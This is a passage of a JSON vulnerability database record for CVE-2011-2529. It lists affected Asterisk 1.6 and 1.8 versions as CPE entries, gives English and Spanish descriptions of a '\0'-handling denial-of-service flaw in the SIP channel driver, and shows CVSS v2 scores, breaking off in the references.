              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC3FCBAE-2A39-482A-ADF9-870DF63F89D8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "57325096-F4D8-4146-A6FD-93219F2C72D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9684FD88-7422-4272-B9BC-D8638B1AA0B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "648639A2-26C4-4EDA-A982-25D400836696",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F9F6FF8-8B88-4A02-B23A-0CADA8CE316E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "37DE011D-1C1B-46AC-9265-F82693CE3C9A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "790BF14A-0193-4A5C-802B-D82200B22342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D552F2D3-EB70-413E-8C4F-DD3283434C7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "15C4C10F-BD36-491A-87E7-2F072796DA33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "929EAA61-BA69-4F36-A5E9-B8F066405384",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E60A7436-AFDB-4540-BD4B-01F25BDFBA3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5A1CCA12-CCF2-46F5-BBDD-AAC0C1E8C5FB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "AB1D4D06-9D83-495F-98BC-0B6E1C3566B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8D8A87FD-EB9C-4D65-824A-159C206F28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "55585411-9272-4ED6-962C-B27EBAE11C76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF7BDB9D-403D-4BC4-83FA-AD39EF131714",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F74046A-9B96-4EE7-AC14-F2A1FBDF65E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "512545F1-F007-43D7-AAE9-8120BC5821D7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "339BEF35-835E-4B06-B9B4-C2DF26A7B3B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "185AF628-BE86-4B09-B7F3-FEF035A6FAD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0643E55-D1D2-4EF3-9CCF-6CBD87F84BAA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "6D4A9B22-7978-44F3-A30C-65FE7024AB6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06219062-9CAD-49D2-823E-E11E74B131D8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "91420C0D-C63B-4916-8335-6BE24EB738FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "FD1D7D08-AC94-49AC-9F16-A6E91F1F1EEE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "05FDA8EA-6610-4D49-9825-34EBFAAD2691",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D11BE58D-5B7E-4BB5-988A-7FC2E4B92C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "22631AE6-5DA1-46C6-A239-C232DA0D0E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9F5CB8CC-4CC1-4A1B-8AD1-C876D1BC80EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8591DB43-EAA0-4D58-BA23-EAD916DEA3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4747F8-1AFC-4AEF-82D8-D6604FB5222E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B82172C9-EA5B-4FC9-A445-0A297AE56FF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0C71CDAB-A299-4F1D-942D-851C899E63BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E2FA9AB9-4C83-45A3-9772-3A16030DBF1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "A88C639A-9229-4D99-9087-1B0B95539BD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B7DE987-7351-495A-8776-37E6B7BF0C0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CB5823CC-941F-47AB-AD1F-325181D40E60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "712AF374-846D-4F21-91C4-1BA9AB33E46D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "E431AF4E-C6A8-424F-9205-01F5FDFB3306",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "52BE29C5-C2C3-4414-A8E1-4D4D926F6E65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "87BBDF0F-7A23-48BA-98BC-0EDEDD2CDDF8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CFF196A0-87E1-4DD2-8CDA-B19EB6F71312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F59B7C5-8EF3-495E-9A91-9C96E6DF41E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9020FF4-645B-4E98-8CB0-3F8DF7C5841B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chan_sip.c in the SIP channel driver in Asterisk Open Source 1.6.x before 1.6.2.18.1 and 1.8.x before 1.8.4.3 does not properly handle \u0027\\0\u0027 characters in SIP packets, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted packet."
    },
    {
      "lang": "es",
      "value": "chan_sip.c en el controlador de canal SIP en Asterisk Open Source v1.6.x anterior a v1.6.2.18.1 y v1.8.x anteriores a v1.8.4.3 no manejan adecuadamente los caracteres \u0027\\0\u0027 en los paquetes SIP, lo que permite a atacantes remotos provocar una denegaci\u00f3n de servicio (corrupci\u00f3n de memoria) o posiblemente tener un impacto no especificado a trav\u00e9s de un paquete dise\u00f1ado."
    }
  ],
  "id": "CVE-2011-2529",
  "lastModified": "2024-11-21T01:28:28.417",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-07-06T19:55:03.450",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
